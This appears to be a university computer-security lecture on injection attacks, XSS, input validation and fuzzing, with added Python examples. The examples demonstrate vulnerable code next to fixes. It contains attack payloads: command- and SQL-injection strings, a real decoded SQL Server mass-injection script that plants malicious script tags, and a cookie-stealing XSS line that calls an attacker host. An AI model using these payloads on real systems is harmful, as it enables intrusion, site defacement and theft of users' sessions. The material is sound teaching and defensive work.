Computer and Information Science
CIS 433/533 - Computer and Network Security
Web Vulnerabilities, Wrapup
Professor Kevin Butler
Winter 2011
Injection Attacks
• flaws in the handling of invalid input, where that input then influences program execution
  ‣ typically when the input is passed as a parameter to a helper program, utility or subsystem (a shell, a database, an interpreter) that gives its metacharacters meaning
• most often occurs in scripting languages
  ‣ they encourage reuse of other programs / modules, usually by handing them strings
CIS 433/533: Computer and Network Security
Unsafe Perl Script

#!/usr/bin/perl
# finger.cgi - finger CGI script using Perl5 CGI module
use strict;
use warnings;
use CGI;
use CGI::Carp qw(fatalsToBrowser);

my $q = CGI->new;    # create query object

# display HTML header
print $q->header,
      $q->start_html('Finger User'),
      $q->h1('Finger User');
print "<pre>";

# get name of user and display their finger details
my $user = $q->param("user");
# VULNERABLE: $user is interpolated unchecked into a command line that the
# shell parses, so a value such as "alice; cat /etc/passwd" runs a second command
print `/usr/bin/finger -sh $user`;

# display HTML footer
print "</pre>";
Safer Script

# get name of user and display their finger details
my $user = $q->param("user");
die "The specified user contains illegal characters!"
    unless ($user =~ /^\w+$/);
print `/usr/bin/finger -sh $user`;

• counter the attack by validating input
  ‣ compare to a pattern that accepts only known-good input (here one word of letters, digits and underscores) and rejects everything else, including shell metacharacters such as ; | & ` and leading - (option injection)
  ‣ caveat: in Perl, $ also matches just before a trailing newline, so "alice\n" passes this test; \z anchors at the true end of string
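The same command-injection flaw and its fix, as an added Python example that is not part of the lecture slides. It assumes a POSIX /bin/sh and replaces /usr/bin/finger with a stand-in program (the Python interpreter printing its arguments) so the example runs anywhere; the attack value "alice; echo INJECTED" is constructed.

```python
import re
import shlex
import subprocess
import sys

# Stand-in for /usr/bin/finger so the example runs anywhere with a POSIX sh:
# a small Python program that just reports the arguments it received.
# (Assumption: the real finger binary is an ordinary argv-taking program.)
FINGER = [sys.executable, "-c", 'import sys; print("finger", sys.argv[1:])']

USER_RE = re.compile(r"\w+", re.ASCII)   # the slide's allow-list, ASCII-only


def finger_unsafe(user):
    """Mirror of the Perl backtick call /usr/bin/finger -sh $user: the raw
    user string is spliced into a command line that /bin/sh then parses."""
    cmd = " ".join(shlex.quote(a) for a in FINGER) + " -sh " + user
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def finger_argv_only(user):
    """No shell at all: the user string is passed as one argv element, so shell
    metacharacters in it are never interpreted (but it is still not validated,
    so e.g. option injection remains the called program's problem)."""
    return subprocess.run(FINGER + ["-sh", user], capture_output=True, text=True).stdout


def finger_safe(user):
    r"""Allow-list first, no shell second. fullmatch() rejects a trailing newline,
    which /^\w+$/ in Perl (and re.match with $ in Python) would let through."""
    if not USER_RE.fullmatch(user):
        raise ValueError("The specified user contains illegal characters!")
    return finger_argv_only(user)


if __name__ == "__main__":
    payload = "alice; echo INJECTED"        # constructed attack value for ?user=
    print(finger_unsafe(payload), end="")     # the second command runs
    print(finger_argv_only(payload), end="")  # whole payload is one argument
    print(finger_safe("alice"), end="")
    try:
        finger_safe(payload)
    except ValueError as e:
        print("rejected:", e)
```

Run it and the unsafe variant prints the stand-in's output followed by a line INJECTED, the argv-only variant prints the whole payload as a single argument, and the validated variant refuses the payload before anything is executed. Both layers are worth keeping: the allow-list stops the request at the door, and avoiding the shell means a gap in the pattern no longer turns into command execution.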
SQL Injection
• another widely exploited injection attack
• occurs when untrusted input is used in an SQL query to the database
  ‣ similar to command injection
  ‣ SQL meta-characters (quotes, comment markers, statement separators) are the concern
  ‣ must check and validate input for these

Vulnerable: the name is concatenated straight into the query, so a value such as ' OR '1'='1 rewrites the WHERE clause

$name = $_REQUEST['name'];
$query = "SELECT * FROM suppliers WHERE name = '" . $name . "';";
$result = mysql_query($query);

Escaped: quote characters in the value are escaped before concatenation

$name = $_REQUEST['name'];
$query = "SELECT * FROM suppliers WHERE name = '" .
         mysql_real_escape_string($name) . "';";
$result = mysql_query($query);

• caveat: escaping only protects a value that sits inside quotes in the query; an unquoted numeric field (WHERE id = $id) is still injectable, so prepared statements with bound parameters (mysqli/PDO) are the preferred fix
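The three cases above (raw concatenation, quote escaping, and an unquoted numeric field where escaping does nothing) next to the parameterized form, as an added Python example that is not from the slides. It uses an in-memory SQLite database with constructed rows in place of MySQL; doubling the quote character is the SQL-standard escape that stands in here for mysql_real_escape_string.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for the slide's `suppliers`."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE suppliers (id INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO suppliers (name) VALUES (?)",
                    [("acme",), ("globex",), ("initech",)])
    return con


def find_by_name_unsafe(con, name):
    """String concatenation, as in the vulnerable PHP: the value becomes SQL."""
    query = "SELECT name FROM suppliers WHERE name = '" + name + "';"
    return [row[0] for row in con.execute(query)]


def sql_escape(value):
    """Quote escaping for a value that will sit inside single quotes."""
    return value.replace("'", "''")


def find_by_name_escaped(con, name):
    """Escaping works here because the value is enclosed in quotes."""
    query = "SELECT name FROM suppliers WHERE name = '" + sql_escape(name) + "';"
    return [row[0] for row in con.execute(query)]


def find_by_id_escaped(con, id_str):
    """The caveat: an unquoted numeric field gains nothing from escaping,
    since the attacker never needs a quote character."""
    query = "SELECT name FROM suppliers WHERE id = " + sql_escape(id_str) + ";"
    return [row[0] for row in con.execute(query)]


def find_by_name_param(con, name):
    """Bound parameter: the driver sends the value separately from the SQL text."""
    rows = con.execute("SELECT name FROM suppliers WHERE name = ?", (name,))
    return [row[0] for row in rows]


def find_by_id_param(con, id_str):
    """Type validation plus binding; non-numeric input is rejected with ValueError."""
    rows = con.execute("SELECT name FROM suppliers WHERE id = ?", (int(id_str),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"        # constructed attack values
    numeric_tautology = "1 OR 1=1"
    print("unsafe:      ", find_by_name_unsafe(db, tautology))    # every row
    print("escaped:     ", find_by_name_escaped(db, tautology))   # no row
    print("id escaped:  ", find_by_id_escaped(db, numeric_tautology))  # every row again
    print("param:       ", find_by_name_param(db, tautology))     # no row
```

The escaped name lookup is safe only because the concatenated value is wrapped in quotes; the id lookup shows why escaping cannot be the general answer, and the parameterized queries remove the question altogether by never letting the value become part of the statement text.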
Consequences
Real SQL Injection

orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x…

• the injected statement is hex-encoded so that no quotes or keywords appear in the request; SQL Server decodes and executes it
• Decoded result:

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE (@@FETCH_STATUS=0) BEGIN
  exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor

• the cursor walks every user table (xtype='u') and every text-typed column (xtype 99, 35, 231, 167 = ntext, text, nvarchar, varchar) and appends a script tag to every value
• every page that later renders those values redirects its visitors to a malicious domain where 8 different browser exploits are launched
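Decoding a request of this shape from a web log, as an added Python example that is not from the slides. The slide truncates the 0x literal, so the sample request is constructed here by re-packing the decoded T-SQL above (commas restored) as an NVARCHAR literal, i.e. UTF-16LE bytes written in hex; the "AS NVARCHAR(4000));EXEC(@S);--" tail of the request is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample in the shape of the slide's request (see lead-in).
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE "
    "(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert("
    "varchar,['+@C+']))+''<script src=nihaorr1.com/1.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor"
)
SAMPLE_URL = (
    "/orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_SQL.encode("utf-16-le").hex().upper()
    + "%20AS%20NVARCHAR(4000));EXEC(@S);--"        # assumed tail
)

HEX_LITERAL = re.compile(r"CAST\(0x([0-9A-Fa-f]+)", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=([^\s>]+)", re.IGNORECASE)


def decode_request(url):
    """Return (outer_sql, inner_sql): the URL-decoded query string, and the
    statement hidden in its CAST(0x...) literal, or None if there is none."""
    query = url.split("?", 1)[1] if "?" in url else url
    outer = unquote(query)
    m = HEX_LITERAL.search(outer)
    if not m or len(m.group(1)) % 2:
        return outer, None
    raw = bytes.fromhex(m.group(1))
    # An NVARCHAR literal is UTF-16LE (every second byte is zero for ASCII
    # text); a VARCHAR literal would be single-byte characters instead.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        inner = raw.decode("utf-16-le")
    else:
        inner = raw.decode("latin-1")
    return outer, inner


def injected_script_sources(sql):
    """List the script src values an injected statement would write into the database."""
    return SCRIPT_SRC.findall(sql) if sql else []


if __name__ == "__main__":
    outer, inner = decode_request(SAMPLE_URL)
    print("outer:", outer[:60], "...")
    print("inner:", inner[:80], "...")
    print("script sources:", injected_script_sources(inner))
```

The two-stage decode matters in practice: a filter or log search that only looks for quotes and SQL keywords in the request sees none of the payload, because the interesting part is inside the hex literal.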
Code Injection
• a further variant of injection
• the input includes code that is then executed
  ‣ see the PHP remote code injection vulnerabilities
• recipe: an uninitialised variable + global field variables (register_globals, which turns request parameters into PHP variables) + remote include (include accepting a URL)
  ‣ this type of attack is widely exploited

<?php
// $path is never initialised here. With register_globals on, a request
// parameter ?path=http://attacker.example/ (hypothetical host) sets it, and
// with remote includes enabled PHP fetches and executes the attacker's
// functions.php on the server.
include $path . 'functions.php';
include $path . 'data/prefs.php';
Cross Site Scripting Attacks
• attacks where input from one user is later output to another user
• XSS commonly seen in scripted web apps
  ‣ with script code included in the output sent to the browser
  ‣ any supported script, e.g. JavaScript, ActiveX
  ‣ the browser assumes the script came from the application on that site, so it runs with that site's privileges (its cookies, its DOM)
• XSS reflection
  ‣ malicious code supplied to the site in a request is echoed straight back in the response (as opposed to stored and served to later visitors)
XSS Example
• guestbooks, wikis, blogs etc
• where a comment includes script code
  ‣ e.g. to collect the cookie details of viewing users
• need to validate the data supplied
  ‣ including handling the various possible encodings of the same characters
• attacks both input and output handling: the comment is accepted on input and emitted unencoded on output

Thanks for this information, it's great!
<script>document.location='http://hacker.web.site/cookie.cgi?'+
document.cookie</script>
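The output-handling side of the guestbook case, as an added Python example that is not from the slides: the slide's payload rendered raw, rendered after a denylist strips only script tags, and rendered with HTML entity encoding. The comments are constructed, and the second attack comment (an image with an onerror handler) is included to show why rejecting known-dangerous markup falls short.

```python
import html
import re

# Constructed guestbook entries; the second is the payload from the slide,
# the third carries the same cookie theft without a <script> element.
COMMENTS = [
    "Nice site!",
    "Thanks for this information, it's great!"
    "<script>document.location='http://hacker.web.site/cookie.cgi?'+document.cookie</script>",
    "<img src=x onerror=\"document.location='http://hacker.web.site/cookie.cgi?'+document.cookie\">",
]

SCRIPT_TAG = re.compile(r"<script.*?</script>", re.IGNORECASE | re.DOTALL)


def render_unsafe(comment):
    """The vulnerable guestbook: the stored comment is emitted as-is."""
    return "<li>" + comment + "</li>"


def render_denylist(comment):
    """Reject known dangerous: strip <script>...</script> and nothing else."""
    return "<li>" + SCRIPT_TAG.sub("", comment) + "</li>"


def render_safe(comment):
    """Encode for the HTML element context: < > & " ' become entities, so
    whatever the comment contains is displayed as text, never parsed as markup.
    An attribute, URL or JavaScript context needs its own encoder instead."""
    return "<li>" + html.escape(comment, quote=True) + "</li>"


def contains_markup(rendered):
    """Check used below: does any tag survive inside the <li> wrapper?"""
    inner = rendered[len("<li>"):-len("</li>")]
    return re.search(r"<[a-zA-Z]", inner) is not None


if __name__ == "__main__":
    for comment in COMMENTS:
        for name, render in (("unsafe", render_unsafe),
                             ("denylist", render_denylist),
                             ("escaped", render_safe)):
            out = render(comment)
            print(f"{name:8} markup={contains_markup(out)!s:5} {out[:70]}")
```

Entity encoding neutralises both payloads because it does not try to recognise attacks at all; it makes the output context unable to interpret the input, which is the output-side half of the defence the slide calls for.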
Validating Input Syntax
• to ensure input data meets the program's assumptions
  ‣ e.g. is printable, HTML, an email address, a userid etc
• compare to what is known to be acceptable
• not to what is known to be dangerous
  ‣ a denylist can miss new problems and bypass methods (alternative encodings, case variants, characters it did not anticipate)
• commonly use regular expressions
  ‣ a pattern of characters describes the allowable input; anchor it so the whole value must match, and check the value after it has been decoded into the form the consumer will see
  ‣ details vary between languages
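Allow-list validation with anchored patterns, the trailing-newline trap of the $ anchor, and checking after decoding, as an added Python example that is not from the slides. The field kinds, their patterns (the email one is deliberately simple) and the inputs are constructed.

```python
import re
from urllib.parse import unquote

# Allow-lists: each pattern describes the complete set of acceptable values.
# re.ASCII keeps \w and the classes below to ASCII (Python's default is Unicode-aware).
PATTERNS = {
    "userid": re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,31}", re.ASCII),
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}", re.ASCII),
    "printable": re.compile(r"[ -~]*", re.ASCII),     # ASCII printable characters only
}


def validate(kind, value):
    """Accept only values that match the allow-list for `kind` in full."""
    return PATTERNS[kind].fullmatch(value) is not None


def sloppy_validate(value):
    r"""The slide's /^\w+$/ transliterated: $ also matches before a final
    newline, so "alice\n" is accepted."""
    return re.match(r"^\w+$", value, re.ASCII) is not None


def denylist_check(value):
    """The anti-pattern: reject a few known-bad characters. An encoded form
    of the same characters sails through."""
    return not any(c in value for c in "<>'\";")


def canonicalize(value, max_rounds=3):
    """Undo URL-encoding until the value stops changing, so the check sees what
    the consumer will see; refuse inputs that keep unwrapping."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def is_acceptable(kind, raw):
    """Decode first, then apply the allow-list to the decoded value."""
    return validate(kind, canonicalize(raw))


if __name__ == "__main__":
    for kind, value in [("userid", "alice"), ("userid", "alice; id"),
                        ("userid", "alice\n"), ("email", "bob@example.com"),
                        ("email", "bob@example.com<script>")]:
        print(f"{kind:8} {value!r:28} allow-list={validate(kind, value)}")
    print("sloppy 'alice\\n':", sloppy_validate("alice\n"))
    print("denylist on '%3Cscript%3E':", denylist_check("%3Cscript%3E"))
    print("decoded allow-list on 'alice%3B%20id':", is_acceptable("userid", "alice%3B%20id"))
```

fullmatch() is the anchoring that the ^...$ idiom only appears to provide; and because the allow-list names what is acceptable rather than what is forbidden, the encoded payload is rejected whether or not anyone thought of that particular encoding.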
Input Fuzzing
• a powerful testing method using a large range of randomly generated inputs
  ‣ to test whether a program/function correctly handles abnormal inputs
  ‣ simple, free of assumptions about where the bugs are, cheap
  ‣ assists with reliability as well as security: a crash on malformed input is a robustness bug first and often an exploitable one
• can also use templates to generate classes of known problem inputs (empty, oversized, boundary lengths, invalid encodings, metacharacters)
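A minimal fuzzer combining both ideas above, random inputs and templated problem classes, as an added Python example that is not from the slides. The target is a constructed record parser with deliberately missing length checks; its contract is to return a parsed record or raise ValueError for malformed input, so any other exception is a finding.

```python
import random
import struct


def parse_record(buf):
    """Constructed target. Format: <len:1 byte><name:len bytes UTF-8><value:2 bytes big-endian>.
    Contract: return a dict, or raise ValueError for malformed input.
    Missing checks: empty input (IndexError) and a length byte larger than
    the data (struct.error). Bad UTF-8 raises UnicodeDecodeError, which is a
    ValueError subclass, so it is within the contract."""
    n = buf[0]
    name = buf[1:1 + n].decode("utf-8")
    (value,) = struct.unpack(">H", buf[1 + n:3 + n])
    return {"name": name, "value": value}


def parse_record_fixed(buf):
    """Same format with the length checked before any field is read."""
    if len(buf) < 1:
        raise ValueError("empty record")
    n = buf[0]
    if len(buf) != 3 + n:
        raise ValueError("length field does not match data")
    try:
        name = buf[1:1 + n].decode("utf-8")
    except UnicodeDecodeError as exc:
        raise ValueError("name is not valid UTF-8") from exc
    (value,) = struct.unpack(">H", buf[1 + n:3 + n])
    return {"name": name, "value": value}


def template_inputs():
    """Classes of known problem inputs: empty, length larger than payload,
    maximal length, invalid UTF-8 in the name, value one byte short."""
    return [b"", b"\x05ab", b"\xff" + b"A" * 10, b"\x02\xff\xfe\x00\x01", b"\x03abc\x00"]


def random_inputs(rng, count, max_len=8):
    """Short random byte strings; small sizes keep the length byte interesting."""
    for _ in range(count):
        yield bytes(rng.randrange(256) for _ in range(rng.randrange(max_len + 1)))


def fuzz(target, iterations=500, seed=1):
    """Run target over templated then random inputs (seeded, so reproducible)
    and return (input, exception) for every failure outside the contract."""
    rng = random.Random(seed)
    findings = []
    for data in list(template_inputs()) + list(random_inputs(rng, iterations)):
        try:
            target(data)
        except ValueError:
            continue            # rejecting bad input is the contract
        except Exception as exc:
            findings.append((data, exc))
    return findings


if __name__ == "__main__":
    for data, exc in fuzz(parse_record)[:5]:
        print(f"{data!r:24} -> {type(exc).__name__}: {exc}")
    print("findings against fixed parser:", len(fuzz(parse_record_fixed)))
```

The contract is what turns a fuzzer into a test: without deciding in advance which exceptions are acceptable, every crash looks the same. The fixed parser still rejects all the same inputs, but does so through the one exception type callers are told to expect.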
Wrapup
The state of security
• … issues are in the public consciousness
  ‣ Press coverage is increasing …
  ‣ Losses mounting … (billions and billions)
  ‣ Impact increasing …… (ATMs, commerce)
  ‣ Public is at risk ....
• What are we doing?
  "… sound and fury signifying nothing …" (well, it's not quite that bad)
The problems …
• What is the root cause?
  ‣ Security is not a key goal ... and it never has been ... so, we need to figure out how to change the way we do engineering (and science) ... to make computers secure.
• Far too much misunderstanding about basic security and the use of technology (security theatre)
The current solutions …
• Make better software
  ‣ "we mean it" - B. Gates (2002)
  ‣ "no really …" - B. Gates (2003)
  ‣ "Linux/OS X/Sun OS etc. is bad too …" - B. Gates (2005)
  ‣ "Vista will fix everything" - B. Gates (2006)
  ‣ "Vista fixes everything" - B. Gates (2007)
  ‣ "Sorry about Vista ...." - B. Gates (2007.5)
  ‣ "Windows 7.0 will fix everything" - B. Gates (2008)
• CERT/SANS-based problem/event tracking
  ‣ Experts tracking vulnerabilities
  ‣ Patch system completely broken
• Destructive research
  ‣ Back-pressure on product developers
  ‣ Arms-race with bad guys
• Problem: reactive, rather than proactive
The real solutions …
• Fix the economic incentive equation …
  ‣ Eventually, MS/Sun/Apple/*** will be in enough pain that they change the way they make software
• Education
  ‣ Things will get better when people understand how to use technology
• Fix engineering practices
  ‣ Design for security
• Apply technology
Your new skills arsenal
• "A little knowledge is a dangerous thing"
• More and more, real lives are at stake through subverting computers
• "With great power comes great responsibility"
The bottom line
• The Web/Internet and new technologies have limited ability to address security and privacy concerns …
• … computer science is making the world less safe!!
• … it is incumbent on us as scientists to meet these challenges.
  ‣ Evangelize the importance of security …
  ‣ Provide sound technologies …